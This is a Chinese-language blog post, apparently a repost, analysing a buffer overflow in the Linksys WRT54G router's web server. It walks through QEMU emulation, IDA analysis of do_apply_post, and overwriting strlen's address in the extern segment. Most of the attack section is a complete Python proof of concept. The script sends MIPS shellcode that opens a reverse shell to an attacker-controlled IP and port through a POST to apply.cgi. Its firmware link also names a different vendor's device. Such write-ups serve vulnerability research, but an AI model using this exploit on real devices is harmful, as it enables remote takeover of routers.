LinksysWRT54G路由器溢出漏洞分析–运行环境修复
- 电脑硬件
- 2025-08-29 23:51:02
Linksys WRT54G路由器溢出漏洞分析–运行环境修复
固件下载:files.dlink .au - /Products/DIR-505/REV_A/Firmware/v1.05b04/
nvram-faker动态库下载: GitHub - zcutlip/nvram-faker: A simple library to intercept calls to libnvram when running embedded linux applications in emulated environments.
攻击机:192.168.40.146
路由器:192.168.40.200
qemu-system启动仿真系统:
sudo qemu-system-mipsel -M malta -kernel vmlinux-3.2\ .0-4-4kc-malta -hda debian_wheezy_mipsel_standard.qcow2 -append "root=/dev/sda1 console=tty0" -net nic -net tap -nographic 利用scp传输路由器文件系统 sudo scp -r ./squashfs-root/ root@192.168.40.200:/root/ 设法启动httpd方法一:
这种方法没成功启动httpd(不知道它的具体开启文件在哪),只打开了个ftp服务。
方法二:
方法三(强制开启):
sudo chroot ./ ./qemu-mipsel-static ./usr/sbin/httpd解释下附带./qemu-mipsel-static:程序所依赖的动态链接库,让它自动识别找不到,所以在qemu用户模式中使用编译好的qemu-mipsel-static程序启动,使用qemu-mipsel-static程序中被编译进去的依赖库。
IDA静态分析根据分析得出伪代码推测:
wreadlen = wfread(post_buf,1,content-length,fhandle); if(wreadlen) strlen(post_buf);读取长度为content-length的所有POST数据到post_buf,如果读取的POST数据长度不为0,就计算post_buf中数据的长度。 这里的content-length是POST参数的长度,在调用do_apply_post函数时并没有进行校验,而该长度在使用读取数据进入内存时也没有进行校验就直接读取了POST参数,因此导致了缓冲区溢出。
我们再看看产生缓冲区溢出的内存post_buf的位置。可以看到,post_buf位于HTTPD的 .data段中,如下图所示。在应用程序中,.data段用于存放已初始化的全局变量,这里的post_buf大小为0x2710字节(10 000字节)。
构造攻击1,tips:IDA各子窗口打开处
2,根据.data段追溯,在漏洞分析中发现,该漏洞有一个特征,缓冲区溢出的数据覆盖到 .data段中的是全局变量。仔细分析能够发现在 .data段后面有以下段,如下图所示。
3,因为这些段是连续的并且可写入(关键条件),所以我们考虑通过do_apply_post函数的漏洞使溢出数据连续覆盖 .data后面的多个段,直到将 .extern段中的strlen函数地址覆盖(IDA中粉红色字体标注的函数都来自extern段),这样,我们就可以在wfread函数覆盖内存以后,在调用strlen函数时将执行流程劫持并执行任意地址的代码,如下图所示。
4,在这里,只要填充0x2F32(0x1000D7A0 - 0x10001AD8)字节的数据,就可以将原来的strlen调用位置填充为任意地址,并控制执行流程。但是,为了利用的稳定性和通用性,这里选择将strlen之后的一段数据一并覆盖,利用方法如下图所示。 在post_buf中填充NOP指令及Shellcode,将post_buf之后总共0x4000字节的数据全部覆盖为post_buf首地址,使布置的缓冲区总是能够覆盖strlen函数地址,strlen指向post_buf,如此一来,原来执行strlen的地方都会跳转到post_buf首地址去执行。这样就可以保证wfread() 函数布置完缓冲区以后,在0x004112D8处执行strlen函数时会被劫持到post_buf头部去执行我们的Shellcode了。
ret2shellcode的方法实现POC import sys import struct,socket import urllib2 def makepayload(host,port): print '[*] prepare shellcode', hosts = struct.unpack('<cccc',struct.pack('<L',host)) ports = struct.unpack('<cccc',struct.pack('<L',port)) mipselshell ="\xfa\xff\x0f\x24" # li t7,-6 mipselshell+="\x27\x78\xe0\x01" # nor t7,t7,zero mipselshell+="\xfd\xff\xe4\x21" # addi a0,t7,-3 mipselshell+="\xfd\xff\xe5\x21" # addi a1,t7,-3 mipselshell+="\xff\xff\x06\x28" # slti a2,zero,-1 mipselshell+="\x57\x10\x02\x24" # li v0,4183 # sys_socket mipselshell+="\x0c\x01\x01\x01" # syscall 0x40404 mipselshell+="\xff\xff\xa2\xaf" # sw v0,-1(sp) mipselshell+="\xff\xff\xa4\x8f" # lw a0,-1(sp) mipselshell+="\xfd\xff\x0f\x34" # li t7,0xfffd mipselshell+="\x27\x78\xe0\x01" # nor t7,t7,zero mipselshell+="\xe2\xff\xaf\xaf" # sw t7,-30(sp) mipselshell+=struct.pack('<2c',ports[1],ports[0]) + "\x0e\x3c" # lui t6,0x1f90 mipselshell+=struct.pack('<2c',ports[1],ports[0]) + "\xce\x35" # ori t6,t6,0x1f90 mipselshell+="\xe4\xff\xae\xaf" # sw t6,-28(sp) mipselshell+=struct.pack('<2c',hosts[1],hosts[0]) + "\x0e\x3c" # lui t6,0x7f01 mipselshell+=struct.pack('<2c',hosts[3],hosts[2]) + "\xce\x35" # ori t6,t6,0x101 mipselshell+="\xe6\xff\xae\xaf" # sw t6,-26(sp) mipselshell+="\xe2\xff\xa5\x27" # addiu a1,sp,-30 mipselshell+="\xef\xff\x0c\x24" # li t4,-17 mipselshell+="\x27\x30\x80\x01" # nor a2,t4,zero mipselshell+="\x4a\x10\x02\x24" # li v0,4170 # sys_connect mipselshell+="\x0c\x01\x01\x01" # syscall 0x40404 mipselshell+="\xfd\xff\x11\x24" # li s1,-3 mipselshell+="\x27\x88\x20\x02" # nor s1,s1,zero mipselshell+="\xff\xff\xa4\x8f" # lw a0,-1(sp) mipselshell+="\x21\x28\x20\x02" # move a1,s1 # dup2_loop mipselshell+="\xdf\x0f\x02\x24" # li v0,4063 # sys_dup2 mipselshell+="\x0c\x01\x01\x01" # syscall 0x40404 mipselshell+="\xff\xff\x10\x24" # li s0,-1 mipselshell+="\xff\xff\x31\x22" # addi s1,s1,-1 mipselshell+="\xfa\xff\x30\x16" # bne s1,s0,68 <dup2_loop> mipselshell+="\xff\xff\x06\x28" # slti a2,zero,-1 mipselshell+="\x62\x69\x0f\x3c" # lui t7,0x2f2f "bi" mipselshell+="\x2f\x2f\xef\x35" # ori t7,t7,0x6269 "//" mipselshell+="\xec\xff\xaf\xaf" # sw t7,-20(sp) mipselshell+="\x73\x68\x0e\x3c" # lui t6,0x6e2f "sh" mipselshell+="\x6e\x2f\xce\x35" # ori t6,t6,0x7368 "n/" mipselshell+="\xf0\xff\xae\xaf" # sw t6,-16(sp) mipselshell+="\xf4\xff\xa0\xaf" # sw zero,-12(sp) mipselshell+="\xec\xff\xa4\x27" # addiu a0,sp,-20 mipselshell+="\xf8\xff\xa4\xaf" # sw a0,-8(sp) mipselshell+="\xfc\xff\xa0\xaf" # sw zero,-4(sp) mipselshell+="\xf8\xff\xa5\x27" # addiu a1,sp,-8 mipselshell+="\xab\x0f\x02\x24" # li v0,4011 # sys_execve mipselshell+="\x0c\x01\x01\x01" # syscall 0x40404 print 'ending ...' return mipselshell try: target = sys.argv[1] except: print "Usage: %s <target>" % sys.argv[0] sys.exit(1) url = "http://%s/apply.cgi" % target #ip='192.168.230.136' sip='192.168.1.100' #reverse_tcp local_ip sport = 1234 #reverse_tcp local_port DataSegSize = 0x4000 host=socket.ntohl(struct.unpack('<I',socket.inet_aton(sip))[0]) payload = makepayload(host,sport) addr = struct.pack("<L",0x10001AD8) DataSegSize = 0x4000 buf = "\x00"*(10000-len(payload))+payload+addr*(DataSegSize/4) req = urllib2.Request(url, buf) print urllib2.urlopen(req).read() 参考Linksys WRT54G 路由器溢出漏洞分析—— 运行环境修复 - 博文视点安全技术大系
LinksysWRT54G路由器溢出漏洞分析–运行环境修复由讯客互联电脑硬件栏目发布,感谢您对讯客互联的认可,以及对我们原创作品以及文章的青睐,非常欢迎各位朋友分享到个人网站或者朋友圈,但转载请说明文章出处“LinksysWRT54G路由器溢出漏洞分析–运行环境修复”
下一篇
基本控制环节的幅频和相频特性
![[第一章web入门]SQL注入-2](/0pic/pp_98.jpg)
![[C++]C++入门--引用](/0pic/pp_22.jpg)
